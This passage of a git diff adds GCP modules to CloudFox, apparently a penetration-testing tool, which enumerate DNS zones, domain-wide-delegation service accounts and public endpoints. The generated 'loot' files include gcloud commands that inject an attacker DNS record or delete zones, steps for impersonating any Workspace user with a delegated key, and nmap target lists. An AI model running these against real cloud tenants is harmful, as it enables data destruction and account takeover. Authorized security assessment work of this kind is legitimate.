globals.GCP_DNS_MODULE_NAME) + } + + ds := DNSService.New() + + // Get zones + zones, err := ds.Zones(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating DNS zones in project %s: %v", projectID, err), globals.GCP_DNS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Zones = append(m.Zones, zones...) + + for _, zone := range zones { + m.addZoneToLoot(zone) + + // Get records for each zone + records, err := ds.Records(projectID, zone.Name) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating DNS records in zone %s: %v", zone.Name, err), globals.GCP_DNS_MODULE_NAME) + } + continue + } + + m.Records = append(m.Records, records...) + for _, record := range records { + m.addRecordToLoot(record, zone) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d zone(s) in project %s", len(zones), projectID), globals.GCP_DNS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DNSModule) initializeLootFiles() { + m.LootMap["dns-gcloud-commands"] = &internal.LootFile{ + Name: "dns-gcloud-commands", + Contents: "# Cloud DNS gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["dns-public-zones"] = &internal.LootFile{ + Name: "dns-public-zones", + Contents: "# Public DNS Zones\n# Generated by CloudFox\n# These zones are publicly resolvable\n\n", + } + m.LootMap["dns-txt-records"] = &internal.LootFile{ + Name: "dns-txt-records", + Contents: "# DNS TXT Records\n# Generated by CloudFox\n# May contain SPF, DKIM, verification tokens, etc.\n\n", + } + m.LootMap["dns-a-records"] = &internal.LootFile{ + Name: "dns-a-records", + Contents: "# DNS A Records\n# Generated by CloudFox\n# IP addresses associated with domains\n\n", + } + m.LootMap["dns-exploitation"] = &internal.LootFile{ + Name: "dns-exploitation", + Contents: "# DNS Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *DNSModule) addZoneToLoot(zone DNSService.ZoneInfo) { + // gcloud commands + m.LootMap["dns-gcloud-commands"].Contents += fmt.Sprintf( + "# Zone: %s (Project: %s)\n"+ + "gcloud dns managed-zones describe %s --project=%s\n"+ + "gcloud dns record-sets list --zone=%s --project=%s\n\n", + zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + ) + + // Public zones + if zone.Visibility == "public" { + m.LootMap["dns-public-zones"].Contents += fmt.Sprintf( + "# Zone: %s\n"+ + "# DNS Name: %s\n"+ + "# Project: %s\n"+ + "# DNSSEC: %s\n\n", + zone.Name, + zone.DNSName, + zone.ProjectID, + zone.DNSSECState, + ) + } + + // Exploitation commands + m.LootMap["dns-exploitation"].Contents += fmt.Sprintf( + "# Zone: %s (Project: %s)\n"+ + "# DNS Name: %s\n"+ + "# Visibility: %s\n", + zone.Name, zone.ProjectID, + zone.DNSName, + zone.Visibility, + ) + + if len(zone.PrivateNetworks) > 0 { + m.LootMap["dns-exploitation"].Contents += fmt.Sprintf( + "# Private Networks: %s\n", + strings.Join(zone.PrivateNetworks, ", "), + ) + } + + m.LootMap["dns-exploitation"].Contents += fmt.Sprintf( + "\n# Add a record (if you have dns.changes.create):\n"+ + "gcloud dns record-sets create attacker.%s --type=A --ttl=300 --rrdatas=\"1.2.3.4\" --zone=%s --project=%s\n\n"+ + "# Delete zone (if you have dns.managedZones.delete):\n"+ + "gcloud dns managed-zones delete %s --project=%s\n\n", + zone.DNSName, zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + ) +} + +func (m *DNSModule) addRecordToLoot(record DNSService.RecordInfo, zone DNSService.ZoneInfo) { + // TXT records (may contain sensitive info) + if record.Type == "TXT" { + m.LootMap["dns-txt-records"].Contents += fmt.Sprintf( + "# %s (Zone: %s)\n", + record.Name, zone.DNSName, + ) + for _, data := range record.RRDatas { + m.LootMap["dns-txt-records"].Contents += fmt.Sprintf("%s\n", data) + } + m.LootMap["dns-txt-records"].Contents += "\n" + } + + // A records (IP addresses) + if record.Type == "A" || record.Type == "AAAA" { + m.LootMap["dns-a-records"].Contents += fmt.Sprintf( + "%s\t%s\t%s\n", + record.Name, record.Type, strings.Join(record.RRDatas, ", "), + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Zones table + zonesHeader := []string{ + "Project ID", + "Zone Name", + "DNS Name", + "Visibility", + "DNSSEC", + "Networks/Peering", + "Forwarding", + } + + var zonesBody [][]string + for _, zone := range m.Zones { + // Format DNSSEC + dnssec := zone.DNSSECState + if dnssec == "" { + dnssec = "off" + } + + // Format networks/peering + networkInfo := "-" + if len(zone.PrivateNetworks) > 0 { + networkInfo = strings.Join(zone.PrivateNetworks, ", ") + } else if zone.PeeringNetwork != "" { + networkInfo = fmt.Sprintf("Peering: %s", zone.PeeringNetwork) + if zone.PeeringTargetProject != "" { + networkInfo += fmt.Sprintf(" (%s)", zone.PeeringTargetProject) + } + } + + // Format forwarding + forwarding := "-" + if len(zone.ForwardingTargets) > 0 { + forwarding = strings.Join(zone.ForwardingTargets, ", ") + } + + zonesBody = append(zonesBody, []string{ + zone.ProjectID, + zone.Name, + zone.DNSName, + zone.Visibility, + dnssec, + networkInfo, + forwarding, + }) + } + + // Records table (interesting types only) + recordsHeader := []string{ + "Zone", + "Name", + "Type", + "TTL", + "Data", + } + + var recordsBody [][]string + interestingTypes := map[string]bool{"A": true, "AAAA": true, "CNAME": true, "MX": true, "TXT": true, "SRV": true} + for _, record := range m.Records { + if !interestingTypes[record.Type] { + continue + } + + // Format data + data := strings.Join(record.RRDatas, ", ") + if len(data) > 60 { + data = data[:57] + "..." + } + + recordsBody = append(recordsBody, []string{ + record.ZoneName, + record.Name, + record.Type, + fmt.Sprintf("%d", record.TTL), + data, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(zonesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-zones", + Header: zonesHeader, + Body: zonesBody, + }) + } + + if len(recordsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-records", + Header: recordsHeader, + Body: recordsBody, + }) + } + + output := DNSOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DNS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go new file mode 100644 index 00000000..868d64d0 --- /dev/null +++ b/gcp/commands/domainwidedelegation.go @@ -0,0 +1,310 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + domainwidedelegationservice "github.com/BishopFox/cloudfox/gcp/services/domainWideDelegationService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDomainWideDelegationCommand = &cobra.Command{ + Use: globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + Aliases: []string{"dwd", "delegation", "workspace-delegation"}, + Short: "Find service accounts with Domain-Wide Delegation to Google Workspace", + Long: `Find service accounts configured for Domain-Wide Delegation (DWD). + +Domain-Wide Delegation allows a service account to impersonate any user in a +Google Workspace domain. This is EXTREMELY powerful and a high-value target. + +With DWD + a service account key, an attacker can: +- Read any user's Gmail +- Access any user's Google Drive +- View any user's Calendar +- Enumerate all users and groups via Admin Directory API +- Send emails as any user +- And much more depending on authorized scopes + +Detection Method: +- Service accounts with OAuth2 Client ID set have DWD enabled +- The actual authorized scopes are configured in Google Admin Console +- We check for naming patterns that suggest DWD purpose + +To Exploit: +1. Obtain a key for the DWD service account +2. Identify a target user email in the Workspace domain +3. Generate tokens with the target user as 'subject' +4. Access Workspace APIs as that user + +Note: Scopes must be authorized in Admin Console > Security > API Controls`, + Run: runGCPDomainWideDelegationCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DomainWideDelegationModule struct { + gcpinternal.BaseGCPModule + + DWDAccounts []domainwidedelegationservice.DWDServiceAccount + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DomainWideDelegationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DomainWideDelegationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DomainWideDelegationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDomainWideDelegationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + if err != nil { + return + } + + module := &DomainWideDelegationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + DWDAccounts: []domainwidedelegationservice.DWDServiceAccount{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DomainWideDelegationModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, m.processProject) + + if len(m.DWDAccounts) == 0 { + logger.InfoM("No Domain-Wide Delegation service accounts found", globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + return + } + + // Count confirmed DWD accounts + confirmedDWD := 0 + criticalCount := 0 + for _, account := range m.DWDAccounts { + if account.DWDEnabled { + confirmedDWD++ + } + if account.RiskLevel == "CRITICAL" { + criticalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potential DWD service account(s) (%d confirmed)", len(m.DWDAccounts), confirmedDWD), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + + if criticalCount > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d DWD accounts with keys - can impersonate Workspace users!", criticalCount), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DomainWideDelegationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking DWD service accounts in project: %s", projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + svc := domainwidedelegationservice.New() + accounts, err := svc.GetDWDServiceAccounts(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error checking project %s: %v", projectID, err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.DWDAccounts = append(m.DWDAccounts, accounts...) + + for _, account := range accounts { + m.addAccountToLoot(account) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS && len(accounts) > 0 { + logger.InfoM(fmt.Sprintf("Found %d DWD account(s) in project %s", len(accounts), projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DomainWideDelegationModule) initializeLootFiles() { + m.LootMap["dwd-accounts"] = &internal.LootFile{ + Name: "dwd-accounts", + Contents: "# Domain-Wide Delegation Service Accounts\n# Generated by CloudFox\n\n", + } + m.LootMap["dwd-critical"] = &internal.LootFile{ + Name: "dwd-critical", + Contents: "# CRITICAL: DWD Accounts with Keys\n# Generated by CloudFox\n# These can impersonate any Google Workspace user!\n\n", + } + m.LootMap["dwd-exploit-commands"] = &internal.LootFile{ + Name: "dwd-exploit-commands", + Contents: "# DWD Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *DomainWideDelegationModule) addAccountToLoot(account domainwidedelegationservice.DWDServiceAccount) { + // All DWD accounts + m.LootMap["dwd-accounts"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Project: %s\n"+ + "## DWD Enabled: %v\n"+ + "## OAuth2 Client ID: %s\n"+ + "## Has Keys: %v (Count: %d)\n", + account.RiskLevel, account.Email, + account.ProjectID, + account.DWDEnabled, + account.OAuth2ClientID, + account.HasKeys, account.KeyCount, + ) + for _, reason := range account.RiskReasons { + m.LootMap["dwd-accounts"].Contents += fmt.Sprintf("## - %s\n", reason) + } + m.LootMap["dwd-accounts"].Contents += "\n" + + // Critical accounts + if account.RiskLevel == "CRITICAL" { + m.LootMap["dwd-critical"].Contents += fmt.Sprintf( + "## [CRITICAL] %s\n"+ + "## Project: %s\n"+ + "## OAuth2 Client ID: %s\n"+ + "## Keys: %d user-managed key(s)\n"+ + "##\n"+ + "## This service account can impersonate ANY user in the Workspace domain!\n"+ + "## To exploit:\n"+ + "## 1. Create/download a key for this SA\n"+ + "## 2. Use the key with a target user email as 'subject'\n"+ + "## 3. Access Gmail, Drive, Calendar, etc. as that user\n\n", + account.Email, + account.ProjectID, + account.OAuth2ClientID, + account.KeyCount, + ) + } + + // Exploit commands + if len(account.ExploitCommands) > 0 { + m.LootMap["dwd-exploit-commands"].Contents += fmt.Sprintf( + "## [%s] %s\n", + account.RiskLevel, account.Email, + ) + for _, cmd := range account.ExploitCommands { + m.LootMap["dwd-exploit-commands"].Contents += cmd + "\n" + } + m.LootMap["dwd-exploit-commands"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main table + header := []string{ + "Risk", + "Email", + "DWD Enabled", + "OAuth2 Client ID", + "Keys", + "Project", + } + + var body [][]string + for _, account := range m.DWDAccounts { + dwdStatus := "No" + if account.DWDEnabled { + dwdStatus = "YES" + } + + clientID := account.OAuth2ClientID + if clientID == "" { + clientID = "-" + } else if len(clientID) > 20 { + clientID = clientID[:20] + "..." + } + + keysDisplay := "-" + if account.HasKeys { + keysDisplay = fmt.Sprintf("%d key(s)", account.KeyCount) + } + + // Shorten email for display + email := account.Email + if len(email) > 40 { + parts := strings.Split(email, "@") + if len(parts) == 2 { + email = parts[0][:15] + "...@" + parts[1] + } + } + + body = append(body, []string{ + account.RiskLevel, + email, + dwdStatus, + clientID, + keysDisplay, + account.ProjectID, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "domain-wide-delegation", + Header: header, + Body: body, + }, + } + + output := DomainWideDelegationOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go new file mode 100644 index 00000000..00bc1f98 --- /dev/null +++ b/gcp/commands/endpoints.go @@ -0,0 +1,665 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + networkservice "github.com/BishopFox/cloudfox/gcp/services/networkService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + compute "google.golang.org/api/compute/v1" +) + +var GCPEndpointsCommand = &cobra.Command{ + Use: globals.GCP_ENDPOINTS_MODULE_NAME, + Aliases: []string{"external", "public-ips", "ips"}, + Short: "Aggregate all public-facing endpoints in GCP", + Long: `Aggregate and analyze all public-facing endpoints across GCP resources. + +Features: +- Enumerates external IP addresses (static and ephemeral) +- Lists load balancers (HTTP(S), TCP, UDP) +- Shows Cloud NAT gateways +- Identifies VPN gateways and Cloud Interconnect +- Maps forwarding rules to backends +- Lists Cloud Run, App Engine, and Cloud Functions URLs +- Identifies public Cloud SQL instances +- Shows GKE ingress endpoints`, + Run: runGCPEndpointsCommand, +} + +// EndpointInfo represents a public-facing endpoint +type EndpointInfo struct { + Name string `json:"name"` + Type string `json:"type"` // IP, LoadBalancer, Function, CloudRun, etc. + Address string `json:"address"` + Protocol string `json:"protocol"` + Port string `json:"port"` + Resource string `json:"resource"` // Associated resource + ResourceType string `json:"resourceType"` // Instance, ForwardingRule, etc. + Region string `json:"region"` + ProjectID string `json:"projectId"` + Status string `json:"status"` + Description string `json:"description"` +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type EndpointsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Endpoints []EndpointInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type EndpointsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o EndpointsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o EndpointsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ENDPOINTS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &EndpointsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Endpoints: []EndpointInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ENDPOINTS_MODULE_NAME, m.processProject) + + // Check results + if len(m.Endpoints) == 0 { + logger.InfoM("No public endpoints found", globals.GCP_ENDPOINTS_MODULE_NAME) + return + } + + // Count by type + typeCounts := make(map[string]int) + for _, ep := range m.Endpoints { + typeCounts[ep.Type]++ + } + + summary := []string{} + for t, c := range typeCounts { + summary = append(summary, fmt.Sprintf("%d %s", c, t)) + } + + logger.SuccessM(fmt.Sprintf("Found %d public endpoint(s): %s", + len(m.Endpoints), strings.Join(summary, ", ")), globals.GCP_ENDPOINTS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *EndpointsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating public endpoints in project: %s", projectID), globals.GCP_ENDPOINTS_MODULE_NAME) + } + + var endpoints []EndpointInfo + + // Create compute service + networkSvc := networkservice.New() + computeSvc, err := networkSvc.GetComputeService(ctx) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error creating compute service for project %s: %v", projectID, err), globals.GCP_ENDPOINTS_MODULE_NAME) + } + return + } + + // 1. Get external IP addresses + ipEndpoints := m.getExternalIPs(ctx, computeSvc, projectID, logger) + endpoints = append(endpoints, ipEndpoints...) + + // 2. Get forwarding rules (load balancers) + fwdEndpoints := m.getForwardingRules(ctx, computeSvc, projectID, logger) + endpoints = append(endpoints, fwdEndpoints...) + + // 3. Get global forwarding rules + globalFwdEndpoints := m.getGlobalForwardingRules(ctx, computeSvc, projectID, logger) + endpoints = append(endpoints, globalFwdEndpoints...) + + // 4. Get instances with external IPs + instanceEndpoints := m.getInstanceExternalIPs(ctx, computeSvc, projectID, logger) + endpoints = append(endpoints, instanceEndpoints...) + + // Thread-safe append + m.mu.Lock() + m.Endpoints = append(m.Endpoints, endpoints...) + + // Generate loot + for _, ep := range endpoints { + m.addEndpointToLoot(ep) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d public endpoint(s) in project %s", len(endpoints), projectID), globals.GCP_ENDPOINTS_MODULE_NAME) + } +} + +// getExternalIPs retrieves static external IP addresses +func (m *EndpointsModule) getExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) []EndpointInfo { + var endpoints []EndpointInfo + + // Get global addresses + req := svc.GlobalAddresses.List(projectID) + err := req.Pages(ctx, func(page *compute.AddressList) error { + for _, addr := range page.Items { + if addr.AddressType == "EXTERNAL" { + user := "-" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + ep := EndpointInfo{ + Name: addr.Name, + Type: "Static IP", + Address: addr.Address, + Protocol: "-", + Port: "-", + Resource: user, + ResourceType: "Address", + Region: "global", + ProjectID: projectID, + Status: addr.Status, + Description: addr.Description, + } + endpoints = append(endpoints, ep) + } + } + return nil + }) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not list global addresses: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + } + + // Get regional addresses + regionsReq := svc.Regions.List(projectID) + err = regionsReq.Pages(ctx, func(page *compute.RegionList) error { + for _, region := range page.Items { + addrReq := svc.Addresses.List(projectID, region.Name) + err := addrReq.Pages(ctx, func(addrPage *compute.AddressList) error { + for _, addr := range addrPage.Items { + if addr.AddressType == "EXTERNAL" { + user := "-" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + ep := EndpointInfo{ + Name: addr.Name, + Type: "Static IP", + Address: addr.Address, + Protocol: "-", + Port: "-", + Resource: user, + ResourceType: "Address", + Region: region.Name, + ProjectID: projectID, + Status: addr.Status, + Description: addr.Description, + } + endpoints = append(endpoints, ep) + } + } + return nil + }) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not list addresses in region %s: %v", region.Name, err), globals.GCP_ENDPOINTS_MODULE_NAME) + } + } + return nil + }) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not list regions: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + } + + return endpoints +} + +// getForwardingRules retrieves regional forwarding rules (load balancers) +func (m *EndpointsModule) getForwardingRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) []EndpointInfo { + var endpoints []EndpointInfo + + // Aggregate across all regions + req := svc.ForwardingRules.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.ForwardingRules == nil { + continue + } + for _, rule := range scopedList.ForwardingRules { + // Only include external load balancers + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + ports := "-" + if rule.PortRange != "" { + ports = rule.PortRange + } else if len(rule.Ports) > 0 { + ports = strings.Join(rule.Ports, ",") + } else if rule.AllPorts { + ports = "ALL" + } + + target := extractResourceName(rule.Target) + if target == "" && rule.BackendService != "" { + target = extractResourceName(rule.BackendService) + } + + regionName := extractRegionFromScope(region) + + ep := EndpointInfo{ + Name: rule.Name, + Type: "LoadBalancer", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: target, + ResourceType: "ForwardingRule", + Region: regionName, + ProjectID: projectID, + Status: "-", + Description: rule.Description, + } + endpoints = append(endpoints, ep) + } + } + } + return nil + }) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not list forwarding rules: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + } + + return endpoints +} + +// getGlobalForwardingRules retrieves global forwarding rules (global load balancers) +func (m *EndpointsModule) getGlobalForwardingRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) []EndpointInfo { + var endpoints []EndpointInfo + + req := svc.GlobalForwardingRules.List(projectID) + err := req.Pages(ctx, func(page *compute.ForwardingRuleList) error { + for _, rule := range page.Items { + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + ports := "-" + if rule.PortRange != "" { + ports = rule.PortRange + } + + target := extractResourceName(rule.Target) + + ep := EndpointInfo{ + Name: rule.Name, + Type: "Global LoadBalancer", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: target, + ResourceType: "GlobalForwardingRule", + Region: "global", + ProjectID: projectID, + Status: "-", + Description: rule.Description, + } + endpoints = append(endpoints, ep) + } + } + return nil + }) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not list global forwarding rules: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + } + + return endpoints +} + +// getInstanceExternalIPs retrieves instances with external IPs +func (m *EndpointsModule) getInstanceExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) []EndpointInfo { + var endpoints []EndpointInfo + + req := svc.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + for _, instance := range scopedList.Instances { + for _, iface := range instance.NetworkInterfaces { + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + zoneName := extractZoneFromScope(zone) + + ipType := "Ephemeral IP" + if accessConfig.Type == "ONE_TO_ONE_NAT" { + ipType = "Instance IP" + } + + ep := EndpointInfo{ + Name: instance.Name, + Type: ipType, + Address: accessConfig.NatIP, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: instance.Name, + ResourceType: "Instance", + Region: zoneName, + ProjectID: projectID, + Status: instance.Status, + Description: instance.Description, + } + endpoints = append(endpoints, ep) + } + } + } + } + } + return nil + }) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not list instances: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + } + + return endpoints +} + +// Helper functions +func extractResourceName(url string) string { + if url == "" { + return "-" + } + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromScope(scope string) string { + // Format: regions/us-central1 + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +func extractZoneFromScope(scope string) string { + // Format: zones/us-central1-a + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *EndpointsModule) initializeLootFiles() { + m.LootMap["endpoints-all-ips"] = &internal.LootFile{ + Name: "endpoints-all-ips", + Contents: "", + } + m.LootMap["endpoints-load-balancers"] = &internal.LootFile{ + Name: "endpoints-load-balancers", + Contents: "# Load Balancer Endpoints\n# Generated by CloudFox\n\n", + } + m.LootMap["endpoints-instance-ips"] = &internal.LootFile{ + Name: "endpoints-instance-ips", + Contents: "# Instance External IPs\n# Generated by CloudFox\n\n", + } + m.LootMap["endpoints-nmap-targets"] = &internal.LootFile{ + Name: "endpoints-nmap-targets", + Contents: "# Nmap Targets\n# Generated by CloudFox\n# nmap -iL endpoints-nmap-targets.txt\n\n", + } +} + +func (m *EndpointsModule) addEndpointToLoot(ep EndpointInfo) { + // All IPs (plain list for tools) + if ep.Address != "" && ep.Address != "-" { + m.LootMap["endpoints-all-ips"].Contents += ep.Address + "\n" + m.LootMap["endpoints-nmap-targets"].Contents += ep.Address + "\n" + } + + // Load balancers + if strings.Contains(ep.Type, "LoadBalancer") { + m.LootMap["endpoints-load-balancers"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Target: %s\n"+ + "# Protocol: %s, Ports: %s\n"+ + "IP=%s\n\n", + ep.Name, + ep.Type, + ep.Resource, + ep.Protocol, + ep.Port, + ep.Address, + ) + } + + // Instance IPs + if ep.ResourceType == "Instance" { + m.LootMap["endpoints-instance-ips"].Contents += fmt.Sprintf( + "# Instance: %s (%s)\n"+ + "# Zone: %s\n"+ + "# Status: %s\n"+ + "IP=%s\n\n", + ep.Name, + ep.ProjectID, + ep.Region, + ep.Status, + ep.Address, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main endpoints table + endpointsHeader := []string{ + "Address", + "Type", + "Protocol", + "Port", + "Resource", + "Resource Type", + "Region", + "Project", + "Status", + } + + var endpointsBody [][]string + for _, ep := range m.Endpoints { + endpointsBody = append(endpointsBody, []string{ + ep.Address, + ep.Type, + ep.Protocol, + ep.Port, + ep.Resource, + ep.ResourceType, + ep.Region, + ep.ProjectID, + ep.Status, + }) + } + + // Load balancers table + lbHeader := []string{ + "Name", + "Address", + "Protocol", + "Ports", + "Target", + "Region", + "Project", + } + + var lbBody [][]string + for _, ep := range m.Endpoints { + if strings.Contains(ep.Type, "LoadBalancer") { + lbBody = append(lbBody, []string{ + ep.Name, + ep.Address, + ep.Protocol, + ep.Port, + ep.Resource, + ep.Region, + 